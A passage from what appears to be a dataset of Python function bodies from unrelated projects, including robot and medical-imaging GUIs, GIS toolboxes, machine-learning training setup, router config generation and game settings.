bind=self.__reference_frame_checkbox,\n text=\"Show Reference Frames\", checked=chk)\n self.__ui_controls.chkbox_ref = reference_checkbox\n self.scene.append_to_caption('\\t')\n\n # Checkbox for robot visibility\n if len(self.__robots) == 0:\n robot_vis_checkbox = checkbox(\n bind=self.__robot_visibility_checkbox,\n text=\"Show Robot\", checked=True)\n else:\n chk = self.__robots[self.__selected_robot].rob_shown\n robot_vis_checkbox = checkbox(\n bind=self.__robot_visibility_checkbox,\n text=\"Show Robot\", checked=chk)\n self.__ui_controls.chkbox_rob = robot_vis_checkbox\n self.scene.append_to_caption('\\n')\n\n # Slider for robot opacity\n self.scene.append_to_caption('Robot Opacity:')\n if len(self.__robots) == 0:\n opacity_slider = slider(bind=self.__opacity_slider, value=1)\n else:\n opc = self.__robots[self.__selected_robot].opacity\n opacity_slider = slider(bind=self.__opacity_slider, value=opc)\n self.__ui_controls.sld_opc = opacity_slider\n self.scene.append_to_caption('\\n')\n\n ##################################################\n # Control manual\n controls_str = '<h3>Controls</h3><br>' \\\n '<b>PAN</b><br>' \\\n 'W , S | <i>forward / backward</i><br>' \\\n 'A , D | <i>left / right</i><br>' \\\n 'SPACE , SHIFT | <i>up / down</i><br>' \\\n '<b>ROTATE</b><br>' \\\n 'CTRL + LMB | <i>free spin</i><br>' \\\n 'ARROWS KEYS | <i>rotate direction</i><br>' \\\n 'Q , E | <i>roll left / right</i><br>' \\\n '<b>ZOOM</b></br>' \\\n 'MOUSEWHEEL | <i>zoom in / out</i>'\n\n self.scene.append_to_caption(controls_str)", "def import_forward(self):\n self.import_property('OG')\n self.import_property('IBU')\n self.import_property('ABV')\n self.import_property('SRM')", "def __init__(self, settings, name, linear_scaling_factor=0.1, angular_scaling_factor=0.1):\n super(ArmControlInterpreter, self).__init__(rate=0.033)\n\n self.settings = settings\n\n self.linear_scaling_factor = linear_scaling_factor\n self.angular_scaling_factor = angular_scaling_factor\n\n self.arm_velocity_client = actionlib.SimpleActionClient('/arm_controller/velocity', rose_arm_controller_msgs.msg.set_velocityAction)\n self.arm_gripper_client = actionlib.SimpleActionClient('/arm_controller/gripper_width', rose_arm_controller_msgs.msg.set_gripper_widthAction)\n\n self.arm_name = name\n\n self.velocity_goal = set_velocityGoal()\n self.gripper_goal = set_gripper_widthGoal()\n\n self.gripper_width = ArmControlInterpreter.gripper_open\n self.open_close_toggle = self.settings[\"open_close\"]", "def __init__(self):\n self.label = \"RAPID Tools\"\n self.alias = \"RAPIDTools\"\n\n # List of tool classes associated with this toolbox\n self.tools = [AddSPTFields,\n AutomaticRAPIDfileGenerator, \n CopyDataToServer,\n CreateNetworkConnectivityFile,\n CreateNetworkConnectivityFileNHDPlus,\n CreateMuskingumParameterFiles,\n CreateMuskingumKFile,\n CreateMuskingumKfacFile,\n CreateMuskingumXField, \n CreateMuskingumXFile, \n CreateRivIDGageFile, \n CreateSubsetFile,\n CreateWeightTableFromWRFGeogrid,\n CreateInflowFileFromWRFHydroRunoff,\n CreateWeightTableFromECMWFRunoff,\n CreateInflowFileFromECMWFRunoff,\n CreateWeightTableFromLDASRunoff,\n CreateWeightTableFrom2DLatLonRunoff,\n CreateDischargeTable,\n CreateDischargeMap,\n FlowlineToPoint,\n DEMtoStreamNetwork,\n PublishDischargeMap,\n StreamNetworktoRAPID,\n StreamNetworktoSPT,\n UpdateWeightTable,\n UpdateDischargeMap,\n ]", "def __init__(self, root, annFile, feature_file, caption_idx):\n\t\timport torch\n\n\t\tsuper().__init__(root, annFile)\n\t\tself.features = torch.load(feature_file, map_location='cpu')\n\t\tself.caption_idx = caption_idx", "def zero_target(*args):\n robots = get_robot_roots()\n if not robots:\n pm.warning('Nothing Selected; Select a valid robot')\n return\n\n try:\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n ik_mode = pm.getAttr(target_ctrl_path + '.ik')\n\n if ik_mode:\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.translate', 0, 0, 0)\n pm.setAttr(tool_ctrl_path + '.rotate', 0, 0, 0)\n else:\n pm.setAttr(target_ctrl_path + '.translate', 0, 0, 0)\n pm.setAttr(target_ctrl_path + '.rotate', 0, 0, 0)\n else:\n a1_fk_ctrl_path = format_path(__A1_FK_CTRL_PATH, robot)\n a2_fk_ctrl_path = format_path(__A2_FK_CTRL_PATH, robot)\n a3_fk_ctrl_path = format_path(__A3_FK_CTRL_PATH, robot)\n a4_fk_ctrl_path = format_path(__A4_FK_CTRL_PATH, robot)\n a5_fk_ctrl_path = format_path(__A5_FK_CTRL_PATH, robot)\n a6_fk_ctrl_path = format_path(__A6_FK_CTRL_PATH, robot)\n\n pm.setAttr(a1_fk_ctrl_path + '.rotateY', 0)\n pm.setAttr(a2_fk_ctrl_path + '.rotateX', 0)\n pm.setAttr(a3_fk_ctrl_path + '.rotateX', 0)\n pm.setAttr(a4_fk_ctrl_path + '.rotateZ', 0)\n pm.setAttr(a5_fk_ctrl_path + '.rotateX', 0)\n pm.setAttr(a6_fk_ctrl_path + '.rotateZ', 0)\n except:\n pm.warning('Cannot zero target')", "def __init__(self, meta: SceneDescription):\n super().__init__(meta)\n self.scenes = []\n self.nodes = []\n self.meshes = []\n self.materials = []\n self.images = []\n self.samplers = []\n self.textures = []\n\n self.path = None\n self.scene = None\n self.gltf = None", "def __init__(self, qasmsourcelines,\n name='main',\n filepath=None,\n no_unknown=False,\n save_pgm_source=False, save_element_source=False,\n save_gate_source=False,\n show_gate_decls=False,\n include_path='.'):\n\n # Control factors\n self.no_unknown = no_unknown\n self.save_pgm_source = save_pgm_source\n self.save_element_source = save_element_source\n self.save_gate_source = save_gate_source\n self.show_gate_decls = show_gate_decls\n self.include_path = include_path\n\n # Init sections\n self.t_sect = T_Sect(name)\n self.c_sect = C_Sect()\n self.g_sect = G_Sect()\n\n if save_pgm_source is None:\n self.s_sect = None\n else:\n self.s_sect = S_Sect()\n\n self.translation = {\n 't_sect': self.t_sect.t_sect,\n 'c_sect': self.c_sect.c_sect,\n 'g_sect': self.g_sect.g_sect,\n 's_sect': self.s_sect.s_sect\n }\n\n # Prepare to process initial source\n self.source_frame_stack = Source_Frame_Stack()\n self.push_source(filepath, qasmsourcelines)", "def __init__(self):\n self.label = \"Data Assistant\"\n self.alias = \"dla\"\n\n # List of tool classes associated with this toolbox\n self.tools = [Append, Stage, NewFile, Preview, Replace]", "def _setup_pipeline_cfg(self):", "def setupConnections(self):\n self.T1Button.connect('clicked(bool)', self.onApplyButton)\n self.RViewButton.connect('clicked(bool)', self.onApplyRViewButton)\n self.CheckButton.connect('stateChanged(int)', self.onCheckbuttonChecked)\n self.LLE_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectLLENode)\n self.LLN_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectLLNNode)\n self.Aref_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectArefNode)\n\n self.ThSlider_LLE.Slider.connect(\"positionsChanged(double,double)\",self.ThSlider_LLE.onSliderChanged)\n self.ThSlider_LLE.SpinBoxL.connect(\"valueChanged(int)\", self.ThSlider_LLE.onSpinBoxLChanged)\n self.ThSlider_LLE.SpinBoxR.connect(\"valueChanged(int)\", self.ThSlider_LLE.onSpinBoxRChanged)\n \n self.ThSlider_LLN.Slider.connect(\"positionsChanged(double,double)\",self.ThSlider_LLN.onSliderChanged)\n self.ThSlider_LLN.SpinBoxL.connect(\"valueChanged(int)\", self.ThSlider_LLN.onSpinBoxLChanged)\n self.ThSlider_LLN.SpinBoxR.connect(\"valueChanged(int)\", self.ThSlider_LLN.onSpinBoxRChanged) \n\n self.ThSlider_ECV.Slider.connect(\"positionsChanged(double,double)\",self.ThSlider_ECV.onSliderChanged)\n self.ThSlider_ECV.SpinBoxL.connect(\"valueChanged(int)\", self.ThSlider_ECV.onSpinBoxLChanged)\n self.ThSlider_ECV.SpinBoxR.connect(\"valueChanged(int)\", self.ThSlider_ECV.onSpinBoxRChanged)\n \n self.Stats.segmentationSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.Stats.onScalarSelectorChanged)\n self.Stats.scalarSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.Stats.onScalarSelectorChanged)\n self.Stats.scalarSelector2.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.Stats.onScalarSelector2Changed)\n self.Stats.SButton.connect('clicked(bool)', self.onApplyGetStatistics)\n\n self.NativeT1_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectNT1Node)\n self.EnhancedT1_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectET1Node)\n self.SB_NBlodd.connect(\"valueChanged(Double)\", self.onSpinBoxNBChanged)\n self.SB_EBlodd.connect(\"valueChanged(Double)\", self.onSpinBoxEBChanged)\n self.SB_Haematocrit.connect(\"valueChanged(Double)\", self.onSpinBoxHChanged)\n self.ECVButton.connect('clicked(bool)',self.onApplyECVButton)", "def config_extra_settings(self, data_dir):\n # load data directory configuration\n self.label_path = data_dir\n self.label_config_dir = os.path.join(self.label_path, 'labelconfig')\n self.label_config_suffix = 'lbl'\n\n # set icon configuration\n self._icon_dir=get_icon_dir()\n\n # set window title\n self.setWindowTitle('FreeROI')\n #self.resize(1280, 1000)\n self.center()\n # set window icon\n self.setWindowIcon(QIcon(os.path.join(self._icon_dir,'icon.png')))\n\n self._init_configuration()\n self._init_label_config_center()\n\n # create actions\n self._create_actions()\n\n # create menus\n self._create_menus()", "def load(settings):\n\n aircraft_file = settings.paths('f_aircraft')\n logger.info(f\"Reading aircraft model from file '{truncate_filepath(aircraft_file)}'...\")\n\n if not os.path.exists(aircraft_file):\n raise IOError(f\"file '{aircraft_file}' not found\")\n\n with open(aircraft_file, 'r') as fp:\n aircraft_dict = json.load(fp)\n\n # ====== Aircraft top level =====\n aircraft = Aircraft()\n aircraft.uid = aircraft_dict['uid']\n\n for key, value in aircraft_dict['refs'].items():\n aircraft.refs[key] = value\n\n # ====== Wings =====\n for wing_entry in aircraft_dict['wings']:\n wing = aircraft.add_wing(wing_entry['uid'])\n wing.symmetry = wing_entry['symmetry']\n\n # ====== Segments =====\n for segment_entry in wing_entry['segments']:\n segment = wing.add_segment(segment_entry['uid'])\n\n for key, value in segment_entry['vertices'].items():\n segment.vertices[key] = value\n\n if segment_entry.get('geometry', None):\n for key, value in segment_entry['geometry'].items():\n segment.geometry[key] = value\n\n for key, value in segment_entry['airfoils'].items():\n # From now on use the absolute file path\n if value.startswith(PATHS.DIR.AIRFOILS):\n value = os.path.join(settings.paths('root'), value)\n segment.airfoils[key] = value\n\n if segment_entry.get('panels', None):\n for key, value in segment_entry['panels'].items():\n segment.panels[key] = value\n\n # ====== Controls =====\n for control_entry in wing_entry.get('controls', []):\n control = wing.add_control(control_entry['uid'])\n control.device_type = control_entry['device_type']\n control.deflection = control_entry['deflection']\n control.deflection_mirror = control_entry.get('deflection_mirror', None)\n\n for key, value in control_entry['segment_uid'].items():\n control.segment_uid[key] = value\n\n for key, value in control_entry['rel_vertices'].items():\n control.rel_vertices[key] = value\n\n for key, value in control_entry['rel_hinge_vertices'].items():\n control.rel_hinge_vertices[key] = value\n\n control.panels['num_c'] = control_entry['panels']['num_c']\n control.check()\n\n aircraft.generate()\n return aircraft", "def __init__(self):\n self.label = \"Neural network input files\"\n self.description = \"Use this tool to create the input ASCII files for the GeoXplore neural network. Before using this tool, the evidence must be combined into a unique conditions raster with the Combine tool and the band statistics must be obtained for all the evidence using the Band Collection Statistics tool. If desired fuzzy membership attribute can be added to each of the training sites. See the ArcMap Tools Options discussion in Usage Tips in the Help about adjusting default setting for this tool.\"\n self.canRunInBackground = False\n self.category = \"Neural network\"", "def setup(self, initdir, settings):\n\n print(\"Moving files into initial run directory:\", initdir)\n initdir = os.path.abspath(initdir)\n for p in os.listdir(self.relaxdir):\n if (p in (io.VASP_INPUT_FILE_LIST + self.settings[\"extra_input_files\"])) and (os.path.join(self.relaxdir, p) != initdir):\n os.rename(os.path.join(self.relaxdir,p), os.path.join(initdir,p))\n print(\"\")\n sys.stdout.flush()\n\n # Keep a backup copy of the base INCAR\n shutil.copyfile(os.path.join(initdir,\"INCAR\"),os.path.join(self.relaxdir,\"INCAR.base\"))\n\n # If an initial incar is called for, copy it in and set the appropriate flag\n if (self.settings[\"initial\"] != None) and (os.path.isfile(os.path.join(self.relaxdir,self.settings[\"initial\"]))):\n new_values = io.Incar(os.path.join(self.relaxdir,self.settings[\"initial\"])).tags\n io.set_incar_tag(new_values, initdir)\n print(\" Set INCAR tags:\", new_values, \"\\n\")\n sys.stdout.flush()", "def settings(args):\n data = {}\n data['train_x'] = load_pkl(os.path.join(args.data_dir, 'train_images.pkl'))\n data['train_y'] = load_pkl(os.path.join(args.data_dir, 'train_labels.pkl'))\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'valid_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, 'valid_labels.pkl'))\n if args.combine_train_val:\n data['train_x'].update(data['valid_x'])\n data['train_y'].update(data['valid_y'])\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'test_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, './data/bsd_pkl_float/test_labels.pkl'))\n args.display_step = len(data['train_x']) / 46\n # Default configuration\n if args.default_settings:\n args.n_epochs = 250\n args.batch_size = 10\n args.learning_rate = 3e-2\n args.std_mult = 0.8\n args.delay = 8\n args.filter_gain = 2\n args.filter_size = 5\n args.n_rings = 4\n args.n_filters = 7\n args.save_step = 5\n args.height = 321\n args.width = 481\n\n args.n_channels = 3\n args.lr_div = 10.\n args.augment = True\n args.sparsity = True\n\n args.test_path = args.save_name\n args.log_path = './logs'\n args.checkpoint_path = './checkpoints'\n\n make_dirs(args, args.test_path)\n make_dirs(args, args.log_path)\n make_dirs(args, args.checkpoint_path)\n\n return args, data", "def create_net(args):\n\n # Load config file for this experiment\n xinfo = yaml.load(open(args.exp)) # experiment info\n\n # copy config to run directory\n assert osp.isdir(args.cache_dir), 'Working directory not found: ' + args.cache_dir\n # output config file\n yaml.dump(xinfo, open(args.exp_config_path, 'w'),\n default_flow_style=False)\n\n # Load dataset config file\n dcfg_path = osp.join(args.data_config_path, xinfo['INPUT']['DATASET'])\n dinfo = yaml.load(open(dcfg_path)) # dataset info\n data_dir = dinfo['ROOT']\n\n layout = xinfo['INPUT']['LAYOUT']\n inps = [s.strip() for l in layout for s in l.split(',')]\n outs = [s.strip() for s in xinfo['REFINE']['TARGETS'].split(',')]\n\n supports = ['seg', 'flow', 'norm', 'rgb', 'depth']\n\n nets = {}\n for split in ['train', 'test']:\n net_inps = []\n net_outs = []\n for inp in inps:\n match = re.search('^(gt|pr)({})'.format('|'.join(supports)), inp)\n assert match is not None, 'Error in config INPUT-LAYOUT: ' + inp\n\n modality = match.group(2)\n nchannels = dinfo[modality]['n']\n path = osp.join(data_dir, dinfo[modality][match.group(1) + '-' + split])\n\n assert osp.exists(path), 'File not found: ' + path\n net_inps.append((inp, path, nchannels))\n\n for out in outs:\n # TODO: read target type: zero couplings, tight, loose couplings\n match = re.search('({})'.format('|'.join(supports)), out)\n assert match is not None, 'Error in config REFINE-TARGET: '+ out\n\n modality = match.group(1)\n nchannels = dinfo[modality]['n']\n path = osp.join(data_dir, dinfo[modality]['gt-' + split])\n\n assert osp.exists(path), 'File not found: ' + path\n net_outs.append((out, path, nchannels))\n\n loss_params = dict()\n mapping = None\n if 'mapping' in dinfo['seg']:\n idx = dinfo['seg']['mapping']\n mapping = dict(zip(idx, xrange(len(idx))))\n\n if split == 'train':\n\n # if the class weights is not in the dataset config file\n if 'gt-train-weights' not in dinfo['seg']:\n print 'Generating median frequency balancing weights.'\n (weights, mapping) = gcw.get_mfb(osp.join(dinfo['ROOT'], dinfo['seg']['gt-train']),\n dinfo['seg']['ignore_label'],\n mapping)\n # save back to dataset config\n dinfo['seg']['gt-train-weights'] = weights\n yaml.dump(dinfo, open(dcfg_path, 'w'), default_flow_style=False)\n else:\n weights = dinfo['seg']['gt-train-weights']\n # update data\n # update loss parameter\n ignore_label = dinfo['seg']['ignore_label']\n ignore_label = mapping[ignore_label] if mapping is not None else ignore_label\n loss_params['loss_param'] = {\n 'ignore_label': ignore_label,\n 'class_weighting': weights\n }\n\n # generate net prototxt\n loader = dinfo['NAME'] + '_loader'\n net_proto = arch.create_net(net_inps, net_outs, split, loader, layout, mapping, **loss_params)\n\n # output to file\n path = osp.join(args.cache_dir, getattr(args, 'exp_{}_path'.format(split)))\n open(path, 'w').write(str(net_proto))\n nets[split] = net_proto\n\n return nets", "def prepare_node(self, node):\n self.interface = IpmiInterface(\n node.get('fencer-ip'),\n node.get('fencer-user'),\n node.get('fencer-password'),\n verbose=CONF.debug)", "def setup(args):\n cfg = get_cfg()\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # customize reszied parameters\n # cfg['INPUT']['MIN_SIZE_TRAIN'] = (20,)\n # cfg['INPUT']['MAX_SIZE_TRAIN'] = 50\n cfg.freeze()\n default_setup(\n cfg, args\n ) # if you don't like any of the default setup, write your own setup code\n return cfg", "def _setup(self, orig=False):\n log_method_call(self, self.name, orig=orig, status=self.status,\n controllable=self.controllable)\n disks = []\n for member in self.devices:\n member.setup(orig=orig)\n disks.append(member.path)\n\n mdraid.mdactivate(self.path,\n members=disks,\n array_uuid=self.mdadmFormatUUID)", "def node_setup(self):\n self.nav_tasks = {} # id -> nav_task\n self.missions = {} # id -> mission\n self.mission_state = {} # mission_id -> current task index.\n self.trigger_nav_task_active = False\n self.trigger_local_path_published = False", "def __init__(self, parent=None):\n\t\tScriptedLoadableModuleWidget.__init__(self, parent)\n\t\tVTKObservationMixin.__init__(self) # needed for parameter node observation\n\t\tself.logic = None\n\t\tself._parameterNode = None\n\t\tself._updatingGUIFromParameterNode = False\n\t\t\n\t\tself.elecModel = None\n\t\tself.elecModelLastButton = None\n\t\tself.elecModelButton = 0\n\t\tself.elecChanLastButton = None\n\t\tself.elecChanButton = 0\n\t\tself.lastPolButton=0\n\t\tself.active = False", "def init_extra_module(self, component_instance, function, mw_data):\n init_extra_actuator(self, component_instance, function, mw_data, ors_genpos_poster)", "def setup(self):\n super().setup()\n self.ctx.restart_calc = None\n self.ctx.inputs = AttributeDict(self.exposed_inputs(XspectraCalculation, 'xspectra'))\n\n self.ctx.inputs.parameters = self.ctx.inputs.parameters.get_dict()", "def __init__(self, animPickerUI, modulesToAdd, parent=None):\n super(ART_AddModuleToCanvas, self).__init__()\n # get the directory path of the tools\n settings = QtCore.QSettings(\"Epic Games\", \"ARTv2\")\n self.toolsPath = settings.value(\"toolsPath\")\n self.iconsPath = settings.value(\"iconPath\")\n self.scriptPath = settings.value(\"scriptPath\")\n self.projectPath = settings.value(\"projectPath\")\n\n self.pickerUI = animPickerUI\n self.modules = []\n self.modulesToAdd = modulesToAdd\n\n # assign close event\n self.closeEvent = self.closeWin\n\n # build the UI\n self.buildUI()", "def changeNodeLib(ned, createNodeWin):\n pass", "def get_init(self, storyboard):\n init = etree.SubElement(storyboard, \"Init\")\n init_act = etree.SubElement(init, \"Actions\")\n self.get_environment_actions(init_act)\n\n # Ego Vehicle\n if QgsProject.instance().mapLayersByName(\"Vehicles - Ego\"):\n vehicle_ego_layer = QgsProject.instance().mapLayersByName(\"Vehicles - Ego\")[0]\n for feature in vehicle_ego_layer.getFeatures():\n veh_id = \"Ego_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n init_speed = feature[\"Init Speed\"]\n agent = feature[\"Agent\"]\n agent_camera = str(feature[\"Agent Camera\"]).lower()\n\n if agent == \"User Defined\":\n agent = feature[\"Agent User Defined\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", str(veh_id))\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)\n self.vehicle_controller(entity, str(feature[\"id\"]), agent, agent_camera, is_ego=True)\n if init_speed != 0:\n self.set_init_speed(entity, init_speed)\n\n # Vehicle\n if QgsProject.instance().mapLayersByName(\"Vehicles\"):\n vehicle_layer = QgsProject.instance().mapLayersByName(\"Vehicles\")[0]\n for feature in vehicle_layer.getFeatures():\n veh_id = \"Vehicle_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n init_speed = feature[\"Init Speed\"]\n agent = feature[\"Agent\"]\n agent_camera = str(feature[\"Agent Camera\"]).lower()\n\n if agent == \"User Defined\":\n agent = feature[\"Agent User Defined\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", str(veh_id))\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)\n self.vehicle_controller(entity, str(feature[\"id\"]), agent, agent_camera, is_ego=False)\n if init_speed != 0:\n self.set_init_speed(entity, init_speed)\n\n # Pedestrian\n if QgsProject.instance().mapLayersByName(\"Pedestrians\"):\n walker_layer = QgsProject.instance().mapLayersByName(\"Pedestrians\")[0]\n for feature in walker_layer.getFeatures():\n ped_id = \"Pedestrian_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n init_speed = feature[\"Init Speed\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", ped_id)\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)\n if init_speed != 0:\n self.set_init_speed(entity, init_speed)\n\n # Static Objects\n if QgsProject.instance().mapLayersByName(\"Static Objects\"):\n props_layer = QgsProject.instance().mapLayersByName(\"Static Objects\")[0]\n for feature in props_layer.getFeatures():\n prop_id = \"Prop_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", prop_id)\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)", "def test_sceneImport24281(self):\r\n\r\n self.delayDisplay(\"Starting the test\")\r\n #\r\n # first, get some data\r\n #\r\n self.delayDisplay(\"Getting Data\")\r\n import SampleData\r\n head = SampleData.downloadSample(\"MRHead\")\r\n\r\n #\r\n # create a label map and set it for editing\r\n #\r\n self.delayDisplay(\"Setting up LabelMap\")\r\n volumesLogic = slicer.modules.volumes.logic()\r\n headLabel = volumesLogic.CreateAndAddLabelVolume( slicer.mrmlScene, head, head.GetName() + '-label' )\r\n selectionNode = slicer.app.applicationLogic().GetSelectionNode()\r\n selectionNode.SetActiveVolumeID( head.GetID() )\r\n selectionNode.SetActiveLabelVolumeID( headLabel.GetID() )\r\n slicer.app.applicationLogic().PropagateVolumeSelection(0)\r\n\r\n #\r\n # got to the editor and do some drawing\r\n #\r\n self.delayDisplay(\"Setting up Editor and drawing\")\r\n parameterNode = EditUtil.getParameterNode()\r\n lm = slicer.app.layoutManager()\r\n paintEffectOptions = EditorLib.PaintEffectOptions()\r\n paintEffectOptions.setMRMLDefaults()\r\n paintEffectOptions.__del__()\r\n\r\n self.delayDisplay('Paint radius is %s' % parameterNode.GetParameter('PaintEffect,radius'))\r\n sliceWidget = lm.sliceWidget('Red')\r\n size = min(sliceWidget.width,sliceWidget.height)\r\n step = int(size / 12)\r\n center = int(size / 2)\r\n parameterNode.SetParameter('PaintEffect,radius', '20')\r\n paintTool = EditorLib.PaintEffectTool(sliceWidget)\r\n self.delayDisplay('Paint radius is %s, tool radius is %d' % (parameterNode.GetParameter('PaintEffect,radius'),paintTool.radius))\r\n for label in range(1,5):\r\n EditUtil.setLabel(label)\r\n pos = center - 2*step + (step * label)\r\n self.delayDisplay('Painting %d, at (%d,%d)' % (label,pos,pos),200)\r\n paintTool.paintAddPoint(pos,pos)\r\n paintTool.paintApply()\r\n paintTool.cleanup()\r\n paintTool = None\r\n\r\n #\r\n # now build:\r\n # create a model using the command line module\r\n # based on the current editor parameters\r\n # - make a new hierarchy node\r\n #\r\n\r\n self.delayDisplay( \"Building...\" )\r\n\r\n parameters = {}\r\n parameters[\"InputVolume\"] = headLabel.GetID()\r\n # create models for all labels\r\n parameters[\"JointSmoothing\"] = True\r\n parameters[\"StartLabel\"] = -1\r\n parameters[\"EndLabel\"] = -1\r\n outHierarchy = slicer.vtkMRMLModelHierarchyNode()\r\n outHierarchy.SetScene( slicer.mrmlScene )\r\n outHierarchy.SetName( \"sceneImport2428Hierachy\" )\r\n slicer.mrmlScene.AddNode( outHierarchy )\r\n parameters[\"ModelSceneFile\"] = outHierarchy\r\n\r\n modelMaker = slicer.modules.modelmaker\r\n self.CLINode = None\r\n self.CLINode = slicer.cli.runSync(modelMaker, self.CLINode, parameters, delete_temporary_files=False)\r\n\r\n self.delayDisplay(\"Models built\")\r\n\r\n success = self.verifyModels()\r\n\r\n success = success and (slicer.mrmlScene.GetNumberOfNodesByClass( \"vtkMRMLModelNode\" ) > 3)\r\n\r\n self.delayDisplay(\"Test finished\")\r\n\r\n if success:\r\n self.delayDisplay(\"Ahh... test passed.\")\r\n else:\r\n self.delayDisplay(\"!$!$!#!@#!@!@$%! Test Failed!!\")\r\n\r\n self.assertTrue(success)", "def onResetParameters(self):\r\n # productive #button\r\n profprint()\r\n fileName = pathToScene = slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config/default.cfg\")\r\n self.logic.loadParameters(fileName)", "def config_and_train(self, sys_args):\n \n self.run_config_function(sys_args)\n self.set_model_name('vgg_16')\n self.set_trainable_and_exclude_scopes(constants.checkpoint_exclude_scopes,\n constants.trainable_scopes)\n self.set_optimizer('sgd')\n self.set_max_number_of_steps(6000)\n self.train_or_eval_net(sys_args)", "def configure_basics_in_routers(self):\n \n basics_script = Basics.get_script_file()\n \n # Alteracao do nome e senha do router no script\n basics_script = Basics.replace_vars(itter_list=basics_script, pattern='{%hostname%}', replace=self.router.nome)\n basics_script = Basics.replace_vars(itter_list=basics_script, pattern='{%password%}', replace=Basics.get_default_password())\n\n _path = f'router-config/cisco/{self.router.nome}.ios'\n\n router_configfile = open(_path, 'w')\n\n # Gravacao dos dados nos arquivos de cada router em cisco/\n try:\n for line in basics_script:\n router_configfile.write(line)\n \n return f'BASICS: Arquivo de configuracao de {self.router.nome} criado com sucesso em {_path}.'\n \n except: f'BASICS: Erro na configuracao do arquivo de {self.router.nome} em {_path}!'\n\n router_configfile.close()", "def setup(self, trainer: \"pl.Trainer\") -> None:\n trainer_fn = trainer.state.fn\n if trainer_fn == TrainerFn.FITTING:\n super().setup(trainer)\n else:\n assert self.accelerator is not None\n self.accelerator.setup(trainer)\n\n # move the model to the correct device\n self.model_to_device()\n self.setup_precision_plugin()\n assert self.model is not None", "def __init__(self, experiment, label=None):\n\n super(DrawTransitions, self).__init__(experiment, name=\"DrawTransitions\", label=label)\n\n self.epoch_start = self.experiment.config.getint(self.config_section, 'epoch_start', 0)\n self.epoch_end = self.experiment.config.getint(self.config_section, 'epoch_end',\n default=self.experiment.config.getint('Experiment', 'epochs', default=-1))\n self.frequency = self.experiment.config.getint(self.config_section, 'frequency', 1)\n self.priority = self.experiment.config.getint(self.config_section, 'priority', 0)\n self.filename = self.experiment.config.get(self.config_section, 'filename', default='transitions')\n self.format = self.experiment.config.get(self.config_section, 'format', default='png')\n self.transparent = self.experiment.config.getboolean(self.config_section, 'transparent', default=False)\n self.display_epoch = self.experiment.config.getboolean(self.config_section, 'display_epoch', default=False)\n\n self.colors = self.experiment.population._cell_class.type_colors\n self.types = self.experiment.population._cell_class.types\n self.max_types = self.experiment.population._cell_class.max_types\n\n self.node_labels = {}", "def _create_default_setting(path):\n try:\n from configparser import ConfigParser\n except ImportError:\n from ConfigParser import ConfigParser # ver. < 3.0\n\n # instantiate\n config = ConfigParser()\n\n # update existing value\n config['Assets Paths'] = {\n 'background': 'assets\\\\images\\\\background.png',\n 'bullet': 'assets\\\\images\\\\bullet.png',\n 'bullet_red': 'assets\\\\images\\\\bullet_red.png',\n 'icon' : 'assets\\\\images\\\\RedInvader.png',\n\n 'ship': 'assets\\\\images\\\\Ship.png',\n 'ship_cr': 'assets\\\\images\\\\ShipCrushedRight.png',\n 'ship_cl': 'assets\\\\images\\\\ShipCrushedLeft.png',\n 'ship_cc': 'assets\\\\images\\\\ShipWhite.png',\n\n 'invadera1': 'assets\\\\images\\\\InvaderA1.png',\n 'invadera2': 'assets\\\\images\\\\InvaderA2.png',\n 'invaderb1': 'assets\\\\images\\\\InvaderB1.png',\n 'invaderb2': 'assets\\\\images\\\\InvaderB2.png',\n 'invaderc1': 'assets\\\\images\\\\InvaderC1.png',\n 'invaderc2': 'assets\\\\images\\\\InvaderC2.png',\n\n }\n config['castle'] = {\n 'castle_location': [\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 0, 0, 0, 1],\n ],\n 'start_x': 50,\n 'start_y': 500,\n 'column': 5,\n 'row': 5,\n 'block_l3': (9, 255, 14),\n 'block_l2': (27, 255, 30),\n 'block_l1': (114, 255, 133),\n }\n config['alien'] = {\n 'margin_width': 200,\n 'margin_height': 20,\n 'column': 'd',\n 'Row': 5,\n 'width_x': 10,\n 'width_y': 10,\n 'movement': 10,\n 'alien_column_config': 